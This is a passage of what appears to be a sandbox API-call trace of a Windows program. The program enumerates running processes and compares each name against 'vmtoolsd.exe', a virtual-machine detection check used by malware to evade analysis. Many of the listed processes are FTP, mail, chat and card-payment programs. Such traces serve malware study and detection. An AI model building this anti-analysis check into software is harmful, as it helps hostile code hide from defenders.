dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0121.855] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="svchost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.855] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0121.857] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="backgroundTaskHost.exe", cchCount1=22, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.857] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0121.859] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iexplore.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.859] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="claim.exe")) returned 1 [0121.860] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="claim.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.860] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="quite do.exe")) returned 1 [0121.862] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="quite do.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.862] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="drop.exe")) returned 1 [0121.864] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="drop.exe", cchCount1=8, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.865] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="that_but.exe")) returned 1 [0121.866] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="that_but.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.866] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x89c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="knowledge sign.exe")) returned 1 [0121.867] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="knowledge sign.exe", cchCount1=18, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.867] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="watch.exe")) returned 1 [0121.869] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="watch.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 3 [0121.869] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="raiseleftbuy.exe")) returned 1 [0121.870] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="raiseleftbuy.exe", cchCount1=16, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.871] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whosouth.exe")) returned 1 [0121.873] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="whosouth.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 3 [0121.873] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="clear.exe")) returned 1 [0121.876] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="clear.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.876] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1050, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factor-western-forget.exe")) returned 1 [0121.878] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="factor-western-forget.exe", cchCount1=25, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.878] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="throwtowardpurpose.exe")) returned 1 [0121.879] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="throwtowardpurpose.exe", cchCount1=22, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.879] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="camera.exe")) returned 1 [0121.880] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="camera.exe", cchCount1=10, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.880] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="arrive.exe")) returned 1 [0121.882] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="arrive.exe", cchCount1=10, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.882] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="storypolice.exe")) returned 1 [0121.883] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="storypolice.exe", cchCount1=15, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.883] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nothing foreign.exe")) returned 1 [0121.885] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nothing foreign.exe", cchCount1=19, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.885] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="move.exe")) returned 1 [0121.886] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="move.exe", cchCount1=8, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.886] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="include effect seven.exe")) returned 1 [0121.887] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="include effect seven.exe", cchCount1=24, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.887] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="serve.exe")) returned 1 [0121.888] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="serve.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.888] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weaponnatural.exe")) returned 1 [0121.890] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="weaponnatural.exe", cchCount1=17, lpString2="vmtoolsd.exe", cchCount2=12) returned 3 [0121.890] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0121.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="alftp.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.892] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0121.895] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3dftp.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.895] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0121.897] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="absolutetelnet.exe", cchCount1=18, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.897] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0121.899] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="barca.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.899] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0121.901] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fling.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.901] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0121.905] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="flashfxp.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.905] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0121.906] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="filezilla.exe", cchCount1=13, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.907] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0121.908] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="far.exe", cchCount1=7, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.908] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0121.910] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bitkinex.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.910] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0121.912] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="coreftp.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.912] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0121.913] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="operamail.exe", cchCount1=13, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.913] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0121.915] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="notepad.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.915] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0121.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="leechftp.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.918] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0121.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="scriptftp.exe", cchCount1=13, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.921] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0121.923] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pidgin.exe", cchCount1=10, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.923] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0121.924] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ncftp.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.924] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0121.926] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="skype.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.926] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0121.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="icq.exe", cchCount1=7, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.928] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0121.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="winscp.exe", cchCount1=10, lpString2="vmtoolsd.exe", cchCount2=12) returned 3 [0121.930] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0121.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gmailnotifierpro.exe", cchCount1=20, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.932] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0121.934] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="foxmailincmail.exe", cchCount1=18, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.934] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0121.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="webdrive.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 3 [0121.936] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0121.937] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="trillian.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.937] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0121.939] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="thunderbird.exe", cchCount1=15, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.939] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0121.942] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="smartftp.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.942] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0121.943] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yahoomessenger.exe", cchCount1=18, lpString2="vmtoolsd.exe", cchCount2=12) returned 3 [0121.944] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0121.945] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="outlook.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.945] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0121.947] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="whatsapp.exe", cchCount1=12, lpString2="vmtoolsd.exe", cchCount2=12) returned 3 [0121.947] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0121.948] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="active-charge.exe", cchCount1=17, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.948] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0121.951] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="accupos.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.951] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0121.953] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="afr38.exe", cchCount1=9, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.953] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0121.955] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="aldelo.exe", cchCount1=10, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.955] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0121.957] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ccv_server.exe", cchCount1=14, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.957] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0121.959] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="centralcreditcard.exe", cchCount1=21, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.959] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0121.961] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="creditservice.exe", cchCount1=17, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.961] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, 